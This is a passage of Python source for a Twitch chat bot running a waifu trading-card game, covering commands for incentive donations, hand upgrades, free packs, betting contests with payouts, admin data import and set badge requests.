cur.execute("INSERT INTO `contributionLog` (`userid`, `to_id`, `to_choice`, `raw_amount`, `contribution`, `currency`, `timestamp`) " +
"VALUES(%s, %s, %s, %s, %s, %s, %s)", logargs)
if contribution + currAmount >= required:
self.message(channel, "%s -> You successfully donated %s and met the %s incentive!" % (
tags['display-name'], contributionStr, title), isWhisper)
else:
self.message(channel,
"%s -> You successfully donated %s towards the %s incentive. It needs %d more points to be met." % (
tags['display-name'], contributionStr, title, (required - currAmount - contribution) * memeMult),
isWhisper)
return
if command == "incentives" and (isMarathonChannel or isWhisper):
with db.cursor() as cur:
cur.execute("SELECT id, title, amount, required FROM incentives WHERE status = 'open'")
incentives = []
incnum = 0
for ic in cur.fetchall():
incnum += 1
if ic[2] >= ic[3]:
incentives.append("%s%s (%s) - MET!" % ("; " if incnum > 1 else "", ic[1], ic[0]))
elif ic[1] == "BonusGame":
incentives.append(
"%s%s (%s) - %d/%d points" % ("; " if incnum > 1 else "", ic[1], ic[0], ic[2] * 10000000, ic[3] * 10000000))
else:
incentives.append(
"%s%s (%s) - %d/%d points" % ("; " if incnum > 1 else "", ic[1], ic[0], ic[2], ic[3]))
if len(incentives) == 0:
self.message(channel,
"%s, there are no incentives currently open right now." % tags['display-name'],
isWhisper)
else:
incentives.append(
". !donate <id> <points> to contribute to an incentive (id is the text in brackets)")
messages = ["Current Open Incentives: "]
for inc in incentives:
if len(messages[-1]) + len(inc) > 400:
messages.append(inc)
else:
messages[-1] += inc
for message in messages:
self.message(channel, message, isWhisper)
return
if command == "upgrade":
user = tags['user-id']
if checkHandUpgrade(user):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
return
spendingsToNext = getNextUpgradeSpendings(user) - getSpendings(user)
multiplier = 0.5 # TODO: Make multiplier configurable
directPrice = max(int(spendingsToNext * multiplier), 1)
if len(args) > 0 and args[0] == "buy":
if hasPoints(user, directPrice):
addPoints(user, directPrice * -1)
addSpending(user, spendingsToNext)
upgradeHand(user, gifted=False)
self.message(channel, "Successfully upgraded {user}'s hand for {price} points!".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
else:
self.message(channel,
"{user}, you do not have enough points to upgrade your hand for {price} points.".format(
user=tags['display-name'], price=str(directPrice)), isWhisper=isWhisper)
return
currLimit = handLimit(tags['user-id'])
msgArgs = (tags['display-name'], currLimit, currLimit + 1, spendingsToNext, directPrice)
self.message(channel, ("%s, you currently have %d slots from pack spending. " +
"For space #%d, spend %d more points or use !upgrade buy for %d points.") % msgArgs,
isWhisper)
return
if command == "announce":
if not (sender in superadmins):
self.message(channel, "Admin Only Command.", isWhisper=isWhisper)
return
if len(args) < 1:
self.message(channel, "Usage: !announce <message>", isWhisper=isWhisper)
return
msg = " ".join(args)
for ch in self.mychannels:
self.message(ch, msg, isWhisper=False)
sendPushNotification('all', {'type': 'announcement',
'message': msg, 'openurl': config['siteHost'] + '/discord'})
self.message(channel, "Sent Announcement to all channels.", isWhisper=isWhisper)
return
if command == "search":
if len(args) < 1:
self.message(channel, "Usage: !search <name>[ from <series>]", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
from_index = [arg.lower() for arg in args].index("from")
q = " ".join(args[:from_index])
series = " ".join(args[from_index + 1:])
except ValueError:
q = " ".join(args)
series = None
result = search(q, series)
if len(result) == 0:
self.message(channel, "No waifu found with that name.", isWhisper=isWhisper)
return
if len(result) > 8:
self.message(channel, "Too many results! ({amount}) - try a longer search query.".format(
amount=str(len(result))), isWhisper=isWhisper)
return
if len(result) == 1:
self.message(channel,
"Found one waifu: [{w[id]}][{rarity}]{w[name]} from {w[series]} (use !lookup {w[id]} for more info)".format(
w=result[0], rarity=config['rarity' + str(result[0]['base_rarity']) + 'Name']),
isWhisper=isWhisper)
else:
self.message(channel, "Multiple results (Use !lookup for more details): " + ", ".join(
map(lambda waifu: str(waifu['id']), result)), isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
return
if command == "promote":
self.message(channel,
"Promotion is now automatic when you gather enough copies of a waifu at the same rarity in your hand.",
isWhisper)
return
if command == "recheckpromos" and sender in superadmins:
with db.cursor() as cur:
cur.execute("SELECT DISTINCT waifuid FROM cards WHERE userid IS NOT NULL AND boosterid IS NULL GROUP BY userid, waifuid, rarity HAVING COUNT(*) >= 2")
rows = cur.fetchall()
ids = [row[0] for row in rows]
attemptPromotions(*ids)
self.message(channel, "Rechecked promotions for %d waifus" % len(ids))
return
if command == "freepacks" or command == "freepack" or (command == "bet" and len(args) > 0 and args[0].lower() == "packs"):
if len(args) > 0 and args[0].lower() in ["open", "claim", "redeem"]:
if len(args) < 2:
self.message(channel, "Usage: !freepacks open <booster name>", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT remaining, boostername FROM freepacks WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
result = cur.fetchone()
if result is None or result[0] == 0:
self.message(channel, "You don't have any free packs of that type left to claim!", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't open a free pack with an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
return
# all good
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, args[1], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
cur.execute("UPDATE freepacks SET remaining = remaining - 1 WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
self.message(channel, "%s, you open a free %s booster: %s/booster?user=%s" % (tags['display-name'], result[1], config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % args[1]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error opening your free pack, please try again later.",
isWhisper)
return
return
else:
with db.cursor() as cur:
cur.execute("SELECT boostername, remaining FROM freepacks WHERE userid = %s AND remaining > 0", [tags['user-id']])
freepacks = cur.fetchall()
if len(freepacks) == 0:
self.message(channel, "%s, you don't have any free pack entitlements right now." % tags['display-name'], isWhisper)
else:
freeStr = ", ".join("%s x%d" % (fp[0], fp[1]) for fp in freepacks)
self.message(channel, "%s, your current free packs: %s. !freepacks open <name> to open one." % (tags['display-name'], freeStr), isWhisper)
return
if command == "bet":
if isWhisper:
self.message(channel, "You can't use bet commands over whisper.", isWhisper)
return
if len(args) < 1:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results OR !bet forcereset",
isWhisper)
return
# check restrictions
with db.cursor() as cur:
cur.execute("SELECT betsBanned, forceresetsBanned FROM channels WHERE name = %s", [channel[1:]])
restrictions = cur.fetchone()
if restrictions is None:
# this shouldn't ever happen, but just in case...
self.message(channel, "This isn't a Waifu TCG channel. No can do.", isWhisper)
return
if restrictions[0] != 0:
self.message(channel, "Bets are currently banned in this channel.")
return
canAdminBets = sender in superadmins or (sender in admins and isMarathonChannel)
isBroadcaster = str(tags["badges"]).find("broadcaster") > -1
canManageBets = canAdminBets or isBroadcaster
bet = parseBetTime(args[0])
if bet:
if sender == channel[1:]:
self.message(channel, "You can't bet in your own channel, sorry!", isWhisper)
return
open = placeBet(channel, tags["user-id"], bet["total"])
if open:
self.message(channel,
"Successfully entered {name}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=bet["hours"],
min=bet["minutes"],
s=bet["seconds"],
ms=bet["ms"],
name=tags['display-name']),
isWhisper)
else:
self.message(channel, "The bets aren't open right now, sorry!", isWhisper)
return
else:
subcmd = str(args[0]).lower()
if canManageBets and subcmd == "open":
if openBet(channel):
self.message(channel, "Bets are now open! Use !bet HH:MM:SS(.ms) to submit your bet!")
else:
self.message(channel,
"There is already a prediction contest in progress in your channel! Use !bet status to check what to do next!")
return
elif canManageBets and subcmd == "start":
confirmed = args[-1].lower() == "yes"
try:
startBet(channel, confirmed)
self.message(channel, "Taking current time as start time! Good Luck! Bets are now closed.")
except NotEnoughBetsException:
self.message(channel, "WARNING: This bet does not currently have enough participants to be eligible for payout. To start anyway, use !bet start yes")
except NotOpenLongEnoughException:
self.message(channel, "You must wait at least %d minutes after opening a bet to start it." % int(config["betMinimumMinutesOpen"]))
except NoBetException:
self.message(channel,
"There wasn't an open prediction contest in your channel! Use !bet status to check current contest status.")
return
elif canManageBets and subcmd == "end":
resultData = endBet(str(channel).lower())
if resultData is None:
self.message(channel,
"There wasn't a prediction contest in progress in your channel! Use !bet status to check current contest status.")
else:
formattedTime = formatTimeDelta(resultData["result"])
winners = resultData["winners"]
winnerNames = []
for n in range(3):
winnerNames.append(winners[n]["name"] if len(winners) > n else "No-one")
self.message(channel,
"Contest has ended in {time}! The top 3 closest were: {first}, {second}, {third}".format(
time=formattedTime, first=winnerNames[0], second=winnerNames[1],
third=winnerNames[2]))
if not canAdminBets and len(winners) >= int(config["betMinimumEntriesForPayout"]):
# notify the discordhook of the new bet completion
chanStr = channel[1:].lower()
discordArgs = {"channel": chanStr, "time": formattedTime, "link": "https://twitch.tv/" + chanStr}
discordbody = {
"username": "WTCG Admin",
"content" : "A bet has just finished in {channel} with a time of {time}. Check results and consider payout at <{link}>.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
return
elif canManageBets and subcmd == "cancel":
if cancelBet(channel):
self.message(channel,
"Cancelled the current prediction contest! Start a new one with !bet open.")
else:
self.message(channel,
"There was no open or in-progress prediction contest in your channel! Start a new one with !bet open.")
return
elif subcmd == "status":
# check for most recent betting
cur = db.cursor()
cur.execute(
"SELECT id, status, startTime, endTime FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
if canManageBets:
self.message(channel,
"No time prediction contests have been done in this channel yet. Use !bet open to open one.")
else:
self.message(channel, "No time prediction contests have been done in this channel yet.")
elif betRow[1] == 'cancelled':
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled. Use !bet open to open a new one.")
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled.")
else:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [betRow[0]])
numBets = cur.fetchone()[0]
cur.execute("SELECT bet FROM placed_bets WHERE userid = %s AND betid = %s",
[tags["user-id"], betRow[0]])
placedBets = cur.fetchall()
placedBet = None if len(placedBets) == 0 else placedBets[0][0]
hasBet = placedBet is not None
if betRow[1] == 'open':
if canManageBets:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. You have not bet yet." % numBets)
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer." % numBets)
else:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. You have not bet yet." % numBets)
elif betRow[1] == 'started':
elapsed = current_milli_time() - betRow[2]
formattedTime = formatTimeDelta(elapsed)
if canManageBets:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. You did not bet." % (
formattedTime, numBets))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results." % (
formattedTime, numBets))
else:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. You did not bet." % (
formattedTime, numBets))
else:
formattedTime = formatTimeDelta(betRow[3] - betRow[2])
paidOut = " and has been paid out" if betRow[1] == 'paid' else ""
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s. Use !bet results to see full results or !bet open to open a new one." % (
formattedTime, numBets, paidOut))
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s." % (
formattedTime, numBets, paidOut))
cur.close()
return
elif canManageBets and subcmd == "results":
cur = db.cursor()
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
self.message(channel, "No time prediction contests have been done in this channel yet.",
isWhisper)
elif betRow[1] == 'cancelled':
self.message(channel, "The most recent contest in this channel was cancelled.", isWhisper)
elif betRow[1] == 'open' or betRow[1] == 'started':
self.message(channel,
"There is a contest currently in progress in this channel, check !bet status.",
isWhisper)
else:
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
formattedTime = formatTimeDelta(resultData["result"])
messages = ["The most recent contest finished in %s." % formattedTime]
if len(resultData["winners"]) == 0:
messages[0] += " There were no bets placed."
else:
messages[0] += " Results: "
place = 0
for row in resultData["winners"]:
place += 1
formattedDelta = ("-" if row["timedelta"] < 0 else "+") + formatTimeDelta(
abs(row["timedelta"]))
formattedBet = formatTimeDelta(row["bet"])
entry = "({place}) {name} - {time} ({delta}); ".format(place=place,
name=row["name"],
time=formattedBet,
delta=formattedDelta)
if len(entry) + len(messages[-1]) > 400:
messages.append(entry)
else:
messages[-1] += entry
for message in messages:
self.message(channel, message, isWhisper)
cur.close()
return
elif subcmd == "forcereset" and canManageBets:
# change a started bet to open, preserving all current bets made
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'started':
self.message(channel, "There is no bet in progress in this channel.", isWhisper)
else:
if '#' + sender == channel:
# own channel, check limit and restriction
if restrictions[1] != 0:
self.message(channel, "This channel is banned from using self forcereset at the present time.")
return
invocation = current_milli_time()
period = invocation - int(config["betForceResetPeriod"])
cur.execute("SELECT COUNT(*), MIN(`timestamp`) FROM forceresets WHERE channel = %s AND `timestamp` > %s", [channel, period])
frData = cur.fetchone()
if frData[0] >= int(config["betForceResetLimit"]):
nextUse = int(frData[1]) + int(config["betForceResetPeriod"]) - invocation
datestring = formatTimeDelta(nextUse, False)
self.message(channel, "You are currently out of self forceresets. Your next one will be available in %s." % datestring)
return
cur.execute("INSERT INTO forceresets (channel, user, `timestamp`) VALUES(%s, %s, %s)", [channel, tags['user-id'], invocation])
cur.execute("UPDATE bets SET status = 'open', startTime = NULL WHERE id = %s",
[betRow[0]])
self.message(channel, "Reset the bet in progress in this channel to open status.",
isWhisper)
return
elif subcmd == "changetime" and canAdminBets:
# change the completion time of a completed bet
if len(args) < 2:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
ctdata = parseBetTime(args[1])
if not ctdata:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'completed':
self.message(channel, "There is no just-completed bet in this channel.", isWhisper)
else:
cur.execute("UPDATE bets SET endTime = startTime + %s WHERE id = %s",
[ctdata["total"], betRow[0]])
self.message(channel,
"Successfully changed end time to: {h}h {min}min {s}s {ms}ms".format(
h=ctdata["hours"],
min=ctdata["minutes"],
s=ctdata["seconds"],
ms=ctdata["ms"]),
isWhisper)
return
elif subcmd == "forceenter" and canAdminBets:
if isMarathonChannel:
self.message(channel, "No forceenters allowed in the marathon channel.", isWhisper)
return
# enter another user into a bet
if len(args) < 3:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
tdata = parseBetTime(args[2])
if not tdata:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
enteruser = args[1].strip().lower()
if enteruser == sender:
self.message(channel, "You can't force-enter your own time, pls.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] not in ("open", "started"):
self.message(channel,
"There is not a bet in this channel that is eligible for force-entries.",
isWhisper)
else:
# check username
cur.execute("SELECT id FROM users WHERE name = %s", [enteruser])
enteridrow = cur.fetchone()
if enteridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
enterid = int(enteridrow[0])
cur.execute(
"REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[betRow[0], enterid, tdata["total"], current_milli_time()])
self.message(channel,
"Successfully entered {user}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=tdata["hours"],
min=tdata["minutes"],
s=tdata["seconds"],
ms=tdata["ms"],
user=enteruser),
isWhisper)
return
elif subcmd == "payout" and canAdminBets:
# pay out most recent bet in this channel
cur = db.cursor()
cur.execute("SELECT COALESCE(MAX(paidAt), 0) FROM bets WHERE channel = %s LIMIT 1", [channel])
lastPayout = cur.fetchone()[0]
currTime = current_milli_time()
if lastPayout > currTime - 79200000 and not isMarathonChannel:
datestring = formatTimeDelta(lastPayout + 79200000 - currTime, False)
self.message(channel, "Bet payout may be used again in this channel in %s." % datestring,
isWhisper)
cur.close()
return
cur.execute(
"SELECT id, status, endTime FROM bets WHERE channel = %s AND status IN('completed', 'paid', 'cancelled') ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or (betRow[1] != 'paid' and betRow[1] != 'completed'):
self.message(channel,
"There is no pending time prediction contest to be paid out for this channel.",
isWhisper)
elif betRow[1] == 'paid':
self.message(channel, "The most recent contest in this channel was already paid out.",
isWhisper)
else:
# do the thing
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
numEntries = len(resultData["winners"])
if numEntries < int(config["betMinimumEntriesForPayout"]):
self.message(channel, "This contest had less than %d entrants, no payout." % int(config["betMinimumEntriesForPayout"]), isWhisper)
cur.close()
return
# calculate first run of prizes
minPrize = int(config["betMinPrize"])
maxPrize = int(config["betMaxPrize"]) * min(1 + numEntries/10, 2)
bbReward = int(config["baseBroadcasterReward"])
canWinBigPrizes = resultData["result"] >= 1800000
whispers = []
prizeStrings = []
place = 0
for winner in resultData["winners"]:
place += 1
if abs(winner["timedelta"]) < 1000 and canWinBigPrizes:
booster = config["sameSecondBooster"]
if abs(winner["timedelta"]) < 10:
booster = config["almostExactBooster"]
giveFreeBooster(winner["id"], booster)
msg = "You won a %s booster from the bet in %s's channel. Open it in any chat with !freepacks open %s" % (booster, channel[1:], booster)
prizeStrings.append("%s - %s pack" % (winner["name"], booster))
cur.execute("UPDATE placed_bets SET prizePack = %s WHERE betid = %s AND userid = %s",
[booster, betRow[0], winner["id"]])
else:
pudding = minPrize + (maxPrize - minPrize) * (numEntries - place) / (numEntries - 1) / (1.4 if place > numEntries / 2 else 1)
if place == 1:
pudding *= 1.3
if isMarathonChannel and booleanConfig("marathonBetBoost"):
pudding *= 1.5
if canWinBigPrizes and abs(winner["timedelta"]) < resultData["result"] / 120:
pudding *= 1.5
if winner["bet"] < resultData["result"] / 2 or winner["bet"] > resultData["result"] * 2:
pudding *= 0.5
pudding = round(pudding)
addPudding(winner["id"], pudding)
msg = "You won %d pudding from the bet in %s's channel. Check and spend it with !pudding" % (pudding, channel[1:])
prizeStrings.append("%s - %d pudding" % (winner["name"], pudding))
cur.execute("UPDATE placed_bets SET prizePudding = %s WHERE betid = %s AND userid = %s",
[pudding, betRow[0], winner["id"]])
whispers.append(('#' + winner["name"], msg))
# broadcaster prize
# run length in hours * 30, rounded to nearest whole pudding
runHours = resultData["result"] / 3600000.0
bcPrize = round(min(max(runHours, 1) * bbReward, int(config["maxBroadcasterReward"])))
capped = False
if not isMarathonChannel:
cur.execute("SELECT COALESCE(SUM(paidBroadcaster), 0) FROM bets WHERE status='paid' AND SUBSTRING(FROM_UNIXTIME(startTime/1000),1,7)=SUBSTRING(NOW(),1,7) AND channel = %s", [channel])
puddingMonth = cur.fetchone()[0] or 0
if puddingMonth + bcPrize > int(config["maxMonthlyBCReward"]):
bcPrize = int(config["maxMonthlyBCReward"]) - puddingMonth
capped = True
prizeStrings.append("%s (broadcaster) - %d pudding%s" % (channel[1:], bcPrize, " (monthly cap reached)" if capped else ""))
whispers.append((channel, "You were rewarded %d pudding%s for running your recent bet. Check and spend it with !pudding" % (bcPrize, " (monthly cap reached)" if capped else "")))
# skip using addPudding to save a database lookup
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE name = %s", [bcPrize, channel[1:]])
# start cooldown for next bet payout at max(endTime, lastPayout + 22h)
payoutTime = min(max(betRow[2], lastPayout + 79200000), current_milli_time())
cur.execute(
"UPDATE bets SET status = 'paid', paidBroadcaster = %s, paidAt = %s WHERE id = %s",
[bcPrize, payoutTime, betRow[0]])
messages = ["Paid out the following prizes: "]
first = True
for prize in prizeStrings:
msg = prize if first else "; " + prize
if len(messages[-1] + msg) > 400:
messages.append(prize)
else:
messages[-1] += msg
first = False
for message in messages:
self.message(channel, message, isWhisper)
# alert each person individually as well
# sent after the messages to the channel itself deliberately
for whisper in whispers:
self.message(whisper[0], whisper[1], True)
cur.close()
return
else:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results",
isWhisper)
return
if command == "import" and sender in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !import url", isWhisper)
return
url = args[0]
if "pastebin.com" in url and "/raw/" not in url:
url = url.replace("pastebin.com/", "pastebin.com/raw/")
try:
r = requests.get(url)
data = r.text.splitlines()
lineno = 0
errorlines = []
addwaifus = []
for line in data:
lineno += 1
if not line.strip():
continue
match = waifu_regex.fullmatch(line.strip())
if match:
addwaifus.append(match.groupdict())
else:
errorlines.append(lineno)
if len(errorlines) > 0:
self.message(channel,
"Error processing waifu data from lines: %s. Please fix formatting and try again." % ", ".join(
str(lineno) for lineno in errorlines), isWhisper)
return
else:
cur = db.cursor()
cur.executemany("INSERT INTO waifus (name, image, base_rarity, series) VALUES(%s, %s, %s, %s)",
[(waifu["name"], waifu["link"], int(waifu["rarity"]), waifu["series"].strip())
for waifu in addwaifus])
cur.close()
self.message(channel, "Successfully added %d waifus to the database." % len(addwaifus),
isWhisper)
return
except Exception:
self.message(channel, "Error loading waifu data.", isWhisper)
logger.error("Error importing waifus: %s", str(sys.exc_info()))
return
if command == "sets" or command == "set":
if len(args) == 0:
self.message(channel,
"Available sets: %s/sets?user=%s . !sets claim to claim all sets you are eligible for." % (
config["siteHost"], sender.lower()), isWhisper)
return
subcmd = args[0].lower()
if subcmd == "claim":
with db.cursor(pymysql.cursors.DictCursor) as cur:
claimable = 0
cur.execute("SELECT sets.* FROM sets LEFT JOIN sets_claimed ON (sets.id=sets_claimed.setid AND sets_claimed.userid = %s) WHERE sets.claimable = 1 AND sets_claimed.userid IS NULL AND id NOT IN(SELECT DISTINCT setID FROM set_cards LEFT JOIN cards ON (set_cards.cardID=cards.waifuid AND cards.userid=%s) WHERE cards.userid IS NULL)", [tags['user-id']]*2)
for row in cur.fetchall():
claimable += 1
if row["lastClaimTime"] is not None:
cooldown = row["lastClaimTime"] + int(config["setCooldownDays"])*86400000 - current_milli_time()
if cooldown > 0:
# on cooldown
datestring = formatTimeDelta(cooldown, False)
self.message(channel, "Could not claim the set %s as it is on cooldown, try again in %s" % (row["name"], datestring), isWhisper)
continue
# calculate rewards
rPts = row["rewardPoints"]
rPud = row["rewardPudding"]
first = False
badgeid = row["badgeid"]
if row["firstClaimer"] is None:
first = True
rPts *= 2
rPud *= 2
badgeid = addBadge(row["name"], config["setBadgeDescription"], config["setBadgeDefaultImage"])
# give rewards
addPoints(tags['user-id'], rPts)
addPudding(tags['user-id'], rPud)
giveBadge(tags['user-id'], badgeid)
claimTime = current_milli_time()
# record everything
scValues = [row["id"], tags['user-id'], rPts, rPud, claimTime]
cur.execute("INSERT INTO sets_claimed (setid, userid, rewardPoints, rewardPudding, timestamp) VALUES(%s, %s, %s, %s, %s)", scValues)
firstClaimer = tags['user-id'] if first else row["firstClaimer"]
cur.execute("UPDATE sets SET firstClaimer = %s, lastClaimTime = %s, badgeid = %s WHERE id = %s", [firstClaimer, claimTime, badgeid, row["id"]])
# let them know what happened
if rPts > 0 and rPud > 0:
reward = "%d points and %d pudding" % (rPts, rPud)
elif rPts > 0:
reward = "%d points" % rPts
else:
reward = "%d pudding" % rPud
msgArgs = (row["name"], " (first claim!)" if first else "", tags['display-name'], reward)
self.message(channel, "Successfully claimed the set %s%s and rewarded %s with %s!" % msgArgs, isWhisper)
# send alert
cur.execute("SELECT waifus.name FROM set_cards INNER JOIN waifus ON set_cards.cardID = waifus.id WHERE setID = %s", [row["id"]])
cards = [sc["name"] for sc in cur.fetchall()]
threading.Thread(target=sendSetAlert,
args=(channel, tags["display-name"], row["name"], cards, reward, first)).start()
if claimable == 0:
self.message(channel, "You do not have any completed sets that are available to be claimed. !sets to check progress.", isWhisper)
return
elif subcmd == "checkid":
if len(args) == 1:
self.message(channel, "Usage: !sets checkid <set name>", isWhisper)
return
checkname = " ".join(args[1:])
with db.cursor() as cur:
cur.execute("SELECT id, name FROM sets WHERE name = %s", checkname)
setData = cur.fetchone()
if setData is None:
self.message(channel, "Could not find that set name in the database.", isWhisper)
else:
self.message(channel, "Set %s's ID is %d." % (setData[1], setData[0]), isWhisper)
return
else:
self.message(channel, "Usage: !sets OR !sets claim OR !sets checkid <set name>", isWhisper)
return
if command == "setbadge":
canManageImages = sender in superadmins
if len(args) < 1:
if canManageImages:
self.message(channel, "Usage: !setbadge change / queue / check / accept / reject", isWhisper)
else:
self.message(channel, "Usage: !setbadge change / list / cancel", isWhisper)
return
subcmd = args[0].lower()
if subcmd in ["change", "request"]:
if len(args) < 3:
self.message(channel, "Usage: !setbadge change <id> <link>", isWhisper)
return
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT id, name, firstClaimer, badgeid FROM sets WHERE id = %s", args[1])
setData = cur.fetchone()
if setData is None:
self.message(channel, "Invalid set ID.", isWhisper)
return
if setData["firstClaimer"] is None or int(setData["firstClaimer"]) != int(tags['user-id']):
self.message(channel, "You aren't the first claimer of %s!" % setData["name"], isWhisper)
return
if canManageImages:
# automatically do the change
try:
hostedURL = processBadgeURL(args[2])
except Exception as ex:
self.message(channel, "Could not process image. %s" % str(ex), isWhisper)
return
cur.execute("UPDATE badges SET image = %s WHERE id = %s", [hostedURL, setData["badgeid"]])
# log the change for posterity
insertArgs = [tags['user-id'], setData["id"], args[2], tags['user-id'], current_milli_time()]
cur.execute("INSERT INTO setbadge_requests (requesterid, setid, image, state, moderatorid, created) VALUES(%s, %s, %s, 'auto_accepted', %s, %s)", insertArgs)
self.message(channel, "Set badge change processed successfully.", isWhisper)
return
else:
cur.execute("SELECT COALESCE(MAX(created), 0) AS lastReq FROM setbadge_requests WHERE state = 'accepted' AND setid = %s", [setData["id"]])
lastRequest = cur.fetchone()["lastReq"]
cooldown = lastRequest + int(config["imageChangeCooldownDays"])*86400000 - current_milli_time()
if cooldown > 0:
datestring = formatTimeDelta(cooldown, False)
self.message(channel, "Sorry, that set has had its badge changed too recently. Please try again in %s" % datestring, isWhisper)
return
try:
validateBadgeURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the link you specified. Please try again later.", isWhisper)
return
# cancel any old pending requests for this set
cur.execute("UPDATE setbadge_requests SET state = 'cancelled', updated = %s WHERE setid = %s AND state = 'pending'", [current_milli_time(), setData["id"]])
# record a new request
insertArgs = [tags['user-id'], setData["id"], args[2], current_milli_time()]
cur.execute("INSERT INTO setbadge_requests (requesterid, setid, image, state, created) VALUES(%s, %s, %s, 'pending', %s)", insertArgs)
# notify the discordhook of the new request
discordArgs = {"user": tags['display-name'], "setid": setData["id"], "name": setData["name"], "image": args[2]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} requested a set badge change for {name} to <{image}>!\nUse `!setbadge check {setid}` in any chat to check it.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Your request has been placed. You will be notified when bot staff accept or decline it.", isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT sets.id, sets.name FROM setbadge_requests sr JOIN sets ON sr.setid=sets.id WHERE sr.requesterid = %s AND sr.state = 'pending'", [tags['user-id']])
reqs = cur.fetchall()
if len(reqs) == 0:
self.message(channel, "You don't have any pending set badge change requests.", isWhisper)
else:
reqList = ", ".join(["[%d] %s" % (req[0], req[1]) for req in reqs])
self.message(channel, "%s, you have pending set badge change requests for: %s." % (tags['display-name'], reqList), isWhisper)
return
elif subcmd == "cancel":
if len(args) < 2:
self.message(channel, "Usage: !setbadge cancel <id>", isWhisper)
return
with db.cursor() as cur:
